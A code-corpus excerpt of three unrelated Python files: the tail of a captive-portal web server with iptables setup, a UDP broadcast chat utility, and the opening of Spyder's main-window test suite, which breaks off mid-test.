"/css/bootstrap.lumen.min.css": {"file": "css/bootstrap.lumen.min.css", "cached": False},
"/js/jquery.min.js": {"file": "js/jquery.min.js", "cached": False},
"/js/popper.min.js": {"file": "js/popper.min.js", "cached": False},
"/js/bootstrap.min.js": {"file": "js/bootstrap.min.js", "cached": False},
"/img/portal.png": {"file": "img/portal.png", "cached": False},
"/img/portal-other.png": {"file": "img/portal-other.png", "cached": False},
# Other pages
".redirect": {"file": "redirect.html", "cached": False},
".message": {"file": "message.html", "cached": False},
}
def get_route(self, method, rawUrl):
# Analise URL
url = urllib.parse.urlparse(rawUrl)
path = url.path
# Headers
headers = {}
# Status
status = 200
# Get file
data = self.get_file(path)
# If file not found
if data == None:
data, headers, status = self.do_redirect(REMOTE_SERVER_LINK, "<p>Redirecting to captive portal...</p>", 2)
return data, headers, status;
# Handle GET requests
def do_GET(self):
# Get file
body, headers, status = self.get_route('GET', self.path)
if body == None :
self.send_response(404)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(str("404: file not found").encode())
return
# Path info
file_name, file_extension = os.path.splitext(self.path)
# Create headers
self.send_response(status)
self.send_header("Content-type", self.get_content_type(file_extension))
for key, value in headers.items():
self.send_header(key, value)
self.end_headers()
# Return file
self.wfile.write(body)
def do_POST(self):
# Get file
body, headers, status = self.get_route('POST', self.path)
if body == None :
self.send_response(404)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(str("404: file not found").encode())
return
# Path info
file_name, file_extension = os.path.splitext(self.path)
# Create headers
self.send_response(status)
self.send_header("Content-type", self.get_content_type(file_extension))
for key, value in headers.items():
self.send_header(key, value)
self.end_headers()
# Return file
self.wfile.write(body)
''' Other Functions
-----------------------------------'''
# Run command
def callCmd(cmd):
subprocess.call(cmd)
def runCmd(cmd):
return subprocess.run(cmd, shell=True, check=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
# List ARP information
def getArpList():
# Get arp
result = runCmd('arp -a')
if result.returncode != 0:
return []
# Parse data
data = result.stdout.decode('utf-8')
data = re.findall(r"\((\d+\.\d+\.\d+\.\d+)\)\s+at\s+([0-9A-Za-z]+:[0-9A-Za-z]+:[0-9A-Za-z]+:[0-9A-Za-z]+:[0-9A-Za-z]+:[0-9A-Za-z]+)\s+\[([^\]]*)\]", data)
devices = []
for device in data:
devices.append({
'ip' : device[0],
'mac' : device[1],
'interface' : device[2]
})
# Return data
return devices
# Get MAC from IP
def getMacFromIp(ip):
devices = getArpList()
for device in devices:
if device['ip'] == ip:
return device['mac']
return '00:00:00:00:00:00'
# List rules information
def getRulesList():
# Get rules
result = runCmd('iptables -L FORWARD -n -v -x')
if result.returncode != 0:
return []
# Parse data
# 7609 2108649 ACCEPT all -- * * 192.168.20.97 0.0.0.0/0
data = result.stdout.decode('utf-8')
data = re.findall(r"\s+(\d+)\s+(\d+)\s+ACCEPT\s+all\s+--\s+\*\s+\*\s+(\d+\.\d+\.\d+\.\d+)\s+0\.0\.0\.0\/0", data)
rules = []
for rule in data:
rules.append({
'packets' : int(rule[0]),
'bytes' : int(rule[1]),
'ip' : rule[2]
})
# Return data
return rules
# Get Rule from IP
def getRuleFromIp(ip):
rules = getRulesList()
for rule in rules:
if rule['ip'] == ip:
return rule
return None
def bytes_sizeof_format(num, suffix='B'):
for unit in ['','K','M','G','T','P','E','Z']:
if abs(num) < 1024.0:
return "%3.1f%s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f%s%s" % (num, 'Y', suffix)
''' Script Start Functions
-----------------------------------'''
# Start Server
def start_server():
threading.Thread(target = server_http).start()
threading.Thread(target = server_https).start()
def server_http():
msgLog("WebServer", "Starting HTTP server")
server = http.server.ThreadingHTTPServer(('', HTTP_SERVER_PORT), RedirectPortal)
try:
server.serve_forever()
except KeyboardInterrupt:
pass
server.server_close()
def server_https():
msgLog("WebServer", "Starting HTTPS server")
#server = http.server.HTTPServer(('', 443), CaptivePortal)
#server = http.server.ThreadingHTTPServer(('', 443), CaptivePortal)
server = http.server.ThreadingHTTPServer(('', HTTPS_SERVER_PORT), CaptivePortal)
server.socket = ssl.wrap_socket(server.socket, keyfile=SSL_KEY_PATH, certfile=SSL_CERT_PATH, server_side=True)
try:
server.serve_forever()
except KeyboardInterrupt:
pass
server.server_close()
def database_init():
if CREDENTIALS_SIGNIN == True:
global database
msgLog("Database", "Initializing database")
database = Database()
# Create Users Example
#database.createUser('test', 'test')
#database.createUser('unipi', 'unipi')
def iptables_reset():
if IPTABLES_RESET == True:
msgLog("iptables", "Reseting iptables")
callCmd(["iptables", "-P", "INPUT", "ACCEPT"])
callCmd(["iptables", "-P", "FORWARD", "ACCEPT"])
callCmd(["iptables", "-P", "OUTPUT", "ACCEPT"])
callCmd(["iptables", "-t", "nat", "-F"])
callCmd(["iptables", "-t", "mangle", "-F"])
callCmd(["iptables", "-F"])
callCmd(["iptables", "-X"])
if IPTABLES_FORWARD == True:
callCmd(["iptables", "-t", "nat", "-A", "POSTROUTING", "-o", INTERFACE_OUTPUT, "-j", "MASQUERADE"])
def iptables_init():
if IPTABLES_INIT == True:
msgLog("iptables", "Initializing iptables")
# Allow DNS if not custom DNS
if not USE_CUSTOM_DNS_SERVER:
callCmd(["iptables", "-A", "FORWARD", "-i", INTERFACE_INPUT, "-p", "tcp", "--dport", "53", "-j" , "ACCEPT"])
callCmd(["iptables", "-A", "FORWARD", "-i", INTERFACE_INPUT, "-p", "udp", "--dport", "53", "-j" , "ACCEPT"])
# Allow traffic to captive portal
callCmd(["iptables", "-A", "FORWARD", "-i", INTERFACE_INPUT, "-p", "tcp", "-d", LOCAL_SERVER_IP, "--dport", str( HTTP_SERVER_PORT), "-j", "ACCEPT"])
callCmd(["iptables", "-A", "FORWARD", "-i", INTERFACE_INPUT, "-p", "tcp", "-d", LOCAL_SERVER_IP, "--dport", str(HTTPS_SERVER_PORT), "-j", "ACCEPT"])
# Block all other traffic
callCmd(["iptables", "-A", "FORWARD", "-i", INTERFACE_INPUT, "-j" , "DROP"])
# Redirecting HTTPS traffic to captive portal (traffic towards the domain)
callCmd(["iptables", "-t", "nat", "-A", "PREROUTING", "-i", INTERFACE_INPUT, "-p", "tcp", "-d", REMOTE_SERVER_IP, "--dport", str(HTTPS_SERVER_PORT), "-j", "DNAT", "--to-destination", LOCAL_SERVER_IP + ":" + str(HTTPS_SERVER_PORT)])
callCmd(["iptables", "-t", "nat", "-A", "POSTROUTING" , "-p", "tcp", "-d", LOCAL_SERVER_IP, "--dport", str(HTTPS_SERVER_PORT), "-j", "SNAT", "--to-source", REMOTE_SERVER_IP])
# Redirecting HTTP traffic to captive portal (all HTTP traffic)
callCmd(["iptables", "-t", "nat", "-A", "PREROUTING", "-i", INTERFACE_INPUT, "-p", "tcp", "--dport", str( HTTP_SERVER_PORT), "-j", "DNAT", "--to-destination", LOCAL_SERVER_IP + ":" + str( HTTP_SERVER_PORT)])
# Forward DNS traffic to local DNS
if USE_CUSTOM_DNS_SERVER:
callCmd(["iptables", "-t", "nat", "-A", "PREROUTING", "-i", INTERFACE_INPUT, "-p", "tcp", "--dport", str(53), "-j", "DNAT", "--to-destination", LOCAL_DNS_SERVER_IP + ":" + str(DNS_SERVER_PORT)])
callCmd(["iptables", "-t", "nat", "-A", "PREROUTING", "-i", INTERFACE_INPUT, "-p", "udp", "--dport", str(53), "-j", "DNAT", "--to-destination", LOCAL_DNS_SERVER_IP + ":" + str(DNS_SERVER_PORT)])
def sso_init():
global SSO_FACEBOOK_EXCLUDE_DOMAINS, SSO_FACEBOOK_EXCLUDE_IPS, SSO_GOOGLE_EXCLUDE_DOMAINS, SSO_GOOGLE_EXCLUDE_DOMAINS_COUNTRIES,SSO_GOOGLE_EXCLUDE_IPS
# Turn facebook domains to server IPs
if SSO_FACEBOOK:
msgLog("SSO", "Loading Facebook IPs ...")
for domain in SSO_FACEBOOK_EXCLUDE_DOMAINS:
try:
ip = socket.gethostbyname(domain)
except socket.gaierror:
ip = None
if ip != None:
if not (ip in SSO_FACEBOOK_EXCLUDE_IPS):
SSO_FACEBOOK_EXCLUDE_IPS.append(ip)
msgLog("SSO", "Found " + str(len(SSO_FACEBOOK_EXCLUDE_IPS)) + " Facebook IPs")
# Turn google domains to server IPs
if SSO_GOOGLE:
msgLog("SSO", "Loading Google IPs ...")
for domain in SSO_GOOGLE_EXCLUDE_DOMAINS:
try:
ip = socket.gethostbyname(domain)
except socket.gaierror:
ip = None
if ip != None:
if not (ip in SSO_GOOGLE_EXCLUDE_IPS):
SSO_GOOGLE_EXCLUDE_IPS.append(ip)
for toplevel in SSO_GOOGLE_EXCLUDE_DOMAINS_COUNTRIES:
try:
ip = socket.gethostbyname('accounts.google' + toplevel)
except socket.gaierror:
ip = None
if ip != None:
if not (ip in SSO_GOOGLE_EXCLUDE_IPS):
SSO_GOOGLE_EXCLUDE_IPS.append(ip)
msgLog("SSO", "Found " + str(len(SSO_GOOGLE_EXCLUDE_IPS)) + " Google IPs")
# Start Monitor Daemon
def start_auth_daemon():
global authDaemon
msgLog("AuthDaemon", "Start Authorizations Daemon")
authDaemon = AuthorizationsDaemon()
auth_daemon_interval()
def auth_daemon_interval():
threading.Timer(AUTHDAEMON_INTERVAL_CHECK, auth_daemon_interval).start()
authDaemon.runChecks()
def msgLog(stype, message, level = LOG_NORMAL):
if level >= LOG_LEVEL:
print("[%s] %s" % (stype, message))
sys.stdout.flush()
''' Script Start
-----------------------------------'''
if __name__ == '__main__':
# Check if root
if os.getuid() != 0:
msgLog("Portal", "Need to run with root rights")
else:
# Set up database
database_init()
# Set up iptables
iptables_reset()
iptables_init()
# SSO init
sso_init()
# Monitor Daemon
start_auth_daemon()
# Start Server
start_server()
|
udpplus.py
|
from socket import *
from time import ctime, sleep
import random
import threading
class UDPPlus:
def __init__(self, port):
# 全局参数配置
self.encoding = "utf-8" # 使用的编码方式
self.broadcastPort = port # 广播端口
self.broadcastHost = self.get_addr() # 广播IP
# 创建广播接收器
self.recvSocket = socket(AF_INET, SOCK_DGRAM)
self.recvSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.recvSocket.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
self.recvSocket.bind((self.broadcastHost, self.broadcastPort))
# 创建广播发送器
self.sendSocket = socket(AF_INET, SOCK_DGRAM)
self.sendSocket.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
# 其他
self.threads = []
# 获取本机的ip地址
def get_addr(self):
# 获取本机计算机名称
hostname = gethostname()
# 获取本机ip并返回
return gethostbyname(hostname)
def send(self):
"""发送广播"""
print("调度节点通信广播器启动成功...")
# self.sendSocket.sendto("".encode(self.encoding), (self.broadcastHost, self.broadcastPort))
while True:
sendData = input("请输入需要发送的消息:")
self.sendSocket.sendto(sendData.encode(self.encoding), (self.broadcastHost, self.broadcastPort))
# self.sendSocket.sendto(sendData.encode(self.encoding), ('255.255.255.255', self.broadcastPort))
# print("【%s】%s:%s" % (ctime(), "我", sendData))
sleep(1)
def recv(self):
"""接收广播"""
print("调度节点通信接收器启动成功...")
while True:
# 接收数据格式:(data, (ip, port))
recvData = self.recvSocket.recvfrom(1024)
print("【%s】[%s : %s] : %s" % (ctime(), recvData[1][0], recvData[1][1], recvData[0].decode(self.encoding)))
sleep(1)
def start(self):
"""启动线程"""
t1 = threading.Thread(target=self.recv)
t2 = threading.Thread(target=self.send)
self.threads.append(t1)
self.threads.append(t2)
for t in self.threads:
t.setDaemon(True)
t.start()
while True:
pass
def startRecv(self):
t1 = threading.Thread(target=self.recv)
self.threads.append(t1)
for t in self.threads:
t.setDaemon(True)
t.start()
while True:
pass
def startSend(self):
t2 = threading.Thread(target=self.send)
self.threads.append(t2)
for t in self.threads:
t.setDaemon(True)
t.start()
while True:
pass
|
test_mainwindow.py
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright © Spyder Project Contributors
#
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
# -----------------------------------------------------------------------------
"""
Tests for the main window.
"""
# Standard library imports
from distutils.version import LooseVersion
import os
import os.path as osp
import re
import shutil
import tempfile
from textwrap import dedent
try:
from unittest.mock import Mock, MagicMock
except ImportError:
from mock import Mock, MagicMock # Python 2
import sys
import uuid
# Third party imports
from flaky import flaky
from IPython.core import release as ipy_release
from jupyter_client.manager import KernelManager
from matplotlib.testing.compare import compare_images
import nbconvert
import numpy as np
from numpy.testing import assert_array_equal
import pylint
import pytest
from qtpy import PYQT5, PYQT_VERSION
from qtpy.QtCore import Qt, QTimer, QEvent, QPoint, QUrl
from qtpy.QtTest import QTest
from qtpy.QtGui import QImage
from qtpy.QtWidgets import (QAction, QApplication, QFileDialog, QLineEdit,
QTabBar, QToolTip, QWidget)
from qtpy.QtWebEngineWidgets import WEBENGINE
# Local imports
from spyder import __trouble_url__, __project_url__
from spyder.app import start
from spyder.app.mainwindow import MainWindow # Tests fail without this import
from spyder.config.base import get_home_dir, get_module_path
from spyder.config.manager import CONF
from spyder.widgets.dock import TabFilter
from spyder.preferences.runconfig import RunConfiguration
from spyder.plugins.base import PluginWindow
from spyder.plugins.help.widgets import ObjectComboBox
from spyder.plugins.help.tests.test_plugin import check_text
from spyder.plugins.ipythonconsole.utils.kernelspec import SpyderKernelSpec
from spyder.py3compat import PY2, to_text_string
from spyder.utils.programs import is_module_installed
from spyder.widgets.dock import DockTitleBar
from spyder.utils.misc import remove_backslashes
# For testing various Spyder urls
if not PY2:
from urllib.request import urlopen
from urllib.error import URLError
else:
from urllib2 import urlopen, URLError
# =============================================================================
# ---- Constants
# =============================================================================
# Location of this file
LOCATION = osp.realpath(osp.join(os.getcwd(), osp.dirname(__file__)))
# Time to wait until the IPython console is ready to receive input
# (in milliseconds)
SHELL_TIMEOUT = 40000 if os.name == 'nt' else 20000
# Need longer EVAL_TIMEOUT, because need to cythonize and C compile ".pyx" file
# before import and eval it
COMPILE_AND_EVAL_TIMEOUT = 30000
# Time to wait for the IPython console to evaluate something (in
# milliseconds)
EVAL_TIMEOUT = 3000
# =============================================================================
# ---- Utility functions
# =============================================================================
def open_file_in_editor(main_window, fname, directory=None):
"""Open a file using the Editor and its open file dialog"""
top_level_widgets = QApplication.topLevelWidgets()
for w in top_level_widgets:
if isinstance(w, QFileDialog):
if directory is not None:
w.setDirectory(directory)
input_field = w.findChildren(QLineEdit)[0]
input_field.setText(fname)
QTest.keyClick(w, Qt.Key_Enter)
def get_thirdparty_plugin(main_window, plugin_title):
"""Get a reference to the thirdparty plugin with the title given."""
for plugin in main_window.thirdparty_plugins:
try:
# New API
if plugin.get_name() == plugin_title:
return plugin
except AttributeError:
# Old API
if plugin.get_plugin_title() == plugin_title:
return plugin
def reset_run_code(qtbot, shell, code_editor, nsb):
"""Reset state after a run code test"""
qtbot.waitUntil(lambda: not shell._executing)
with qtbot.waitSignal(shell.executed):
shell.execute('%reset -f')
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0, timeout=EVAL_TIMEOUT)
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
def start_new_kernel(startup_timeout=60, kernel_name='python', spykernel=False,
**kwargs):
"""Start a new kernel, and return its Manager and Client"""
km = KernelManager(kernel_name=kernel_name)
if spykernel:
km._kernel_spec = SpyderKernelSpec()
km.start_kernel(**kwargs)
kc = km.client()
kc.start_channels()
try:
kc.wait_for_ready(timeout=startup_timeout)
except RuntimeError:
kc.stop_channels()
km.shutdown_kernel()
raise
return km, kc
def find_desired_tab_in_window(tab_name, window):
all_tabbars = window.findChildren(QTabBar)
for current_tabbar in all_tabbars:
for tab_index in range(current_tabbar.count()):
if current_tabbar.tabText(tab_index) == str(tab_name):
return current_tabbar, tab_index
return None, None
# =============================================================================
# ---- Fixtures
# =============================================================================
@pytest.fixture
def main_window(request):
"""Main Window fixture"""
# Tests assume inline backend
CONF.set('ipython_console', 'pylab/backend', 0)
# Test assume the plots are rendered in the console as png
CONF.set('plots', 'mute_inline_plotting', False)
CONF.set('ipython_console', 'pylab/inline/figure_format', 0)
# Check if we need to use introspection in a given test
# (it's faster and less memory consuming not to use it!)
use_introspection = request.node.get_closest_marker('use_introspection')
if use_introspection:
os.environ['SPY_TEST_USE_INTROSPECTION'] = 'True'
else:
try:
os.environ.pop('SPY_TEST_USE_INTROSPECTION')
except KeyError:
pass
# Only use single_instance mode for tests that require it
single_instance = request.node.get_closest_marker('single_instance')
if single_instance:
CONF.set('main', 'single_instance', True)
else:
CONF.set('main', 'single_instance', False)
# Get config values passed in parametrize and apply them
try:
param = request.param
if isinstance(param, dict) and 'spy_config' in param:
CONF.set(*param['spy_config'])
except AttributeError:
pass
if not hasattr(main_window, 'window'):
# Start the window
window = start.main()
main_window.window = window
else:
window = main_window.window
# Close everything we can think of
window.editor.close_file()
window.projects.close_project()
if window.console.error_dialog:
window.console.close_error_dialog()
window.switcher.close()
for client in window.ipyconsole.get_clients():
window.ipyconsole.close_client(client=client, force=True)
# Reset cwd
window.explorer.chdir(get_home_dir())
yield window
# Print shell content if failed
if request.node.rep_setup.passed:
if request.node.rep_call.failed:
# Print content of shellwidget and close window
print(window.ipyconsole.get_current_shellwidget(
)._control.toPlainText())
# Print info page content is not blank
console = window.ipyconsole
client = console.get_current_client()
if client.info_page != client.blank_page:
print('info_page')
print(client.info_page)
window.close()
del main_window.window
@pytest.fixture(scope="session", autouse=True)
def cleanup(request):
"""Cleanup a testing directory once we are finished."""
def remove_test_dir():
if hasattr(main_window, 'window'):
main_window.window.close()
request.addfinalizer(remove_test_dir)
# =============================================================================
# ---- Tests
# =============================================================================
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.first
@pytest.mark.single_instance
@pytest.mark.skipif((os.environ.get('CI', None) is None or (PY2
and not sys.platform.startswith('linux'))),
reason="It's not meant to be run outside of CIs")
def test_single_instance_and_edit_magic(main_window, qtbot, tmpdir):
"""Test single instance mode and %edit magic."""
editorstack = main_window.editor.get_current_editorstack()
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
spy_dir = osp.dirname(get_module_path('spyder'))
lock_code = ("import sys\n"
"sys.path.append(r'{spy_dir_str}')\n"
"from spyder.config.base import get_conf_path\n"
"from spyder.utils.external import lockfile\n"
"lock_file = get_conf_path('spyder.lock')\n"
"lock = lockfile.FilesystemLock(lock_file)\n"
"lock_created = lock.lock()".format(spy_dir_str=spy_dir))
# Test single instance
with qtbot.waitSignal(shell.executed, timeout=2000):
shell.execute(lock_code)
assert not shell.get_value('lock_created')
# Test %edit magic
n_editors = editorstack.get_stack_count()
p = tmpdir.mkdir("foo").join("bar.py")
p.write(lock_code)
with qtbot.waitSignal(shell.executed):
shell.execute('%edit {}'.format(to_text_string(p)))
qtbot.wait(3000)
assert editorstack.get_stack_count() == n_editors + 1
assert editorstack.get_current_editor().toPlainText() == lock_code
main_window.editor.close_file()
@pytest.mark.slow
def test_lock_action(main_window):
"""Test the lock interface action."""
action = main_window.lock_interface_action
plugins = main_window.widgetlist
# By default the interface is locked.
assert main_window.interface_locked
# In this state the title bar is an empty QWidget
for plugin in plugins:
title_bar = plugin.dockwidget.titleBarWidget()
assert not isinstance(title_bar, DockTitleBar)
assert isinstance(title_bar, QWidget)
# Test that our custom title bar is shown when the action
# is triggered.
action.trigger()
for plugin in plugins:
title_bar = plugin.dockwidget.titleBarWidget()
assert isinstance(title_bar, DockTitleBar)
assert not main_window.interface_locked
# Restore default state
action.trigger()
assert main_window.interface_locked
@pytest.mark.slow
@pytest.mark.first
@pytest.mark.skipif(os.name == 'nt' and PY2, reason="Fails on win and py2")
def test_default_plugin_actions(main_window, qtbot):
"""Test the effect of dock, undock, close and toggle view actions."""
# Use a particular plugin
file_explorer = main_window.explorer
# Undock action
file_explorer._undock_action.triggered.emit(True)
qtbot.wait(500)
assert not file_explorer.dockwidget.isVisible()
assert file_explorer._undocked_window is not None
assert isinstance(file_explorer._undocked_window, PluginWindow)
assert file_explorer._undocked_window.centralWidget() == file_explorer
# Dock action
file_explorer._dock_action.triggered.emit(True)
qtbot.wait(500)
assert file_explorer.dockwidget.isVisible()
assert file_explorer._undocked_window is None
# Close action
file_explorer._close_plugin_action.triggered.emit(True)
qtbot.wait(500)
assert not file_explorer.dockwidget.isVisible()
assert not file_explorer._toggle_view_action.isChecked()
# Toggle view action
file_explorer._toggle_view_action.setChecked(True)
assert file_explorer.dockwidget.isVisible()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize('main_window', [{'spy_config': ('main', 'opengl', 'software')}], indirect=True)
def test_opengl_implementation(main_window, qtbot):
"""
Test that we are setting the selected OpenGL implementation
"""
assert main_window._test_setting_opengl('software')
# Restore default config value
CONF.set('main', 'opengl', 'automatic')
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
np.__version__ < '1.14.0' or (os.name == 'nt' and PY2),
reason="This only happens in Numpy 1.14+"
)
@pytest.mark.parametrize('main_window', [{'spy_config': ('variable_explorer', 'minmax', True)}], indirect=True)
def test_filter_numpy_warning(main_window, qtbot):
"""
Test that we filter a warning shown when an array contains nan
values and the Variable Explorer option 'Show arrays min/man'
is on.
For spyder-ide/spyder#7063.
"""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Create an array with a nan value
with qtbot.waitSignal(shell.executed):
shell.execute('import numpy as np; A=np.full(16, np.nan)')
qtbot.wait(1000)
# Assert that no warnings are shown in the console
assert "warning" not in control.toPlainText()
assert "Warning" not in control.toPlainText()
# Restore default config value
CONF.set('variable_explorer', 'minmax', False)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(PY2 or not sys.platform == 'darwin',
reason="Times out in PY2 and fails on other than macOS")
def test_get_help_combo(main_window, qtbot):
"""
Test that Help can display docstrings for names typed in its combobox.
"""
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
if WEBENGINE:
webpage = webview.page()
else:
webpage = webview.page().mainFrame()
# --- From the console ---
# Write some object in the console
with qtbot.waitSignal(shell.executed):
shell.execute('import numpy as np')
# Get help - numpy
object_combo = help_plugin.get_widget().object_combo
object_combo.setFocus()
qtbot.keyClicks(object_combo, 'numpy', delay=100)
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "NumPy"), timeout=6000)
# Get help - numpy.arange
qtbot.keyClicks(object_combo, '.arange', delay=100)
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "arange"), timeout=6000)
# Get help - np
# Clear combo
object_combo.set_current_text('')
qtbot.keyClicks(object_combo, 'np', delay=100)
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "NumPy"), timeout=6000)
# Get help - np.arange
qtbot.keyClicks(object_combo, '.arange', delay=100)
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "arange"), timeout=6000)
@pytest.mark.slow
@pytest.mark.skipif(PY2, reason="Invalid definition of function in Python 2.")
def test_get_help_ipython_console_dot_notation(main_window, qtbot, tmpdir):
"""
Test that Help works when called from the IPython console
with dot calls i.e np.sin
See spyder-ide/spyder#11821
"""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Open test file
test_file = osp.join(LOCATION, 'script_unicode.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Run test file
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
# Write function name
qtbot.keyClicks(control, u'np.linalg.norm')
# Get help
control.inspect_current_object()
# Check that a expected text is part of the page
qtbot.waitUntil(
lambda: check_text(webpage, "Matrix or vector norm."),
timeout=6000)
@pytest.mark.slow
@pytest.mark.skipif(PY2, reason="Invalid definition of function in Python 2.")
def test_get_help_ipython_console_special_characters(
main_window, qtbot, tmpdir):
"""
Test that Help works when called from the IPython console
for unusual characters.
See spyder-ide/spyder#7699
"""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Open test file
test_file = osp.join(LOCATION, 'script_unicode.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Run test file
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
# Write function name and assert in Console
def check_control(control, value):
return value in control.toPlainText()
qtbot.keyClicks(control, u'aa\t')
qtbot.waitUntil(lambda: check_control(control, u'aaʹbb'), timeout=2000)
# Get help
control.inspect_current_object()
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "This function docstring."),
timeout=6000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' and os.environ.get('CI') is not None,
reason="Times out on AppVeyor")
def test_get_help_ipython_console(main_window, qtbot):
"""Test that Help works when called from the IPython console."""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
# Write some object in the console
qtbot.keyClicks(control, 'runfile')
# Get help
control.inspect_current_object()
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "namespace"), timeout=6000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin',
reason="Does not work on Mac!")
@pytest.mark.use_introspection
@pytest.mark.parametrize(
"object_info",
[("range", "range"),
("import matplotlib.pyplot as plt",
"The object-oriented API is recommended for more complex plots.")])
def test_get_help_editor(main_window, qtbot, object_info):
"""Test that Help works when called from the Editor."""
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
main_window.editor.new(fname="test.py", text="")
code_editor = main_window.editor.get_focus_widget()
editorstack = main_window.editor.get_current_editorstack()
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_open()
# Write some object in the editor
object_name, expected_text = object_info
code_editor.set_text(object_name)
code_editor.move_cursor(len(object_name))
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_change()
# Get help
with qtbot.waitSignal(code_editor.sig_display_object_info, timeout=30000):
editorstack.inspect_current_object()
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, expected_text), timeout=30000)
@pytest.mark.slow
def test_window_title(main_window, tmpdir):
"""Test window title with non-ascii characters."""
projects = main_window.projects
# Create a project in non-ascii path
path = to_text_string(tmpdir.mkdir(u'測試'))
projects.open_project(path=path)
# Set non-ascii window title
main_window.window_title = u'اختبار'
# Assert window title is computed without errors
# and has the expected strings
main_window.set_window_title()
title = main_window.base_title
assert u'Spyder' in title
assert u'Python' in title
assert u'اختبار' in title
assert u'測試' in title
projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or PY2, reason="It fails sometimes")
@pytest.mark.parametrize(
"debugcell", [True, False])
def test_move_to_first_breakpoint(main_window, qtbot, debugcell):
"""Test that we move to the first breakpoint if there's one present."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Main variables
control = shell._control
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Set breakpoint
code_editor.debugger.toogle_breakpoint(line_number=10)
qtbot.wait(500)
cursor = code_editor.textCursor()
cursor.setPosition(0)
code_editor.setTextCursor(cursor)
if debugcell:
# Advance 2 cells
for i in range(2):
qtbot.keyClick(code_editor, Qt.Key_Return,
modifier=Qt.ShiftModifier)
qtbot.wait(500)
# Debug the cell
qtbot.keyClick(code_editor, Qt.Key_Return,
modifier=Qt.AltModifier | Qt.ShiftModifier)
try:
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
# We need to press continue as we don't test yet if a breakpoint
# is in the cell
qtbot.keyClick(shell._control, 'c')
qtbot.keyClick(shell._control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
except Exception:
print('Shell content: ', shell._control.toPlainText(), '\n\n')
raise
else:
# Click the debug button
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Verify that we are at first breakpoint
shell.clear_console()
qtbot.wait(500)
shell.pdb_execute("list")
qtbot.wait(500)
assert "1--> 10 arr = np.array(li)" in control.toPlainText()
# Exit debugging
shell.pdb_execute("exit")
qtbot.wait(500)
# Set breakpoint on first line with code
code_editor.debugger.toogle_breakpoint(line_number=2)
qtbot.wait(500)
# Click the debug button
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Verify that we are still on debugging
try:
assert shell.is_waiting_pdb_input()
except Exception:
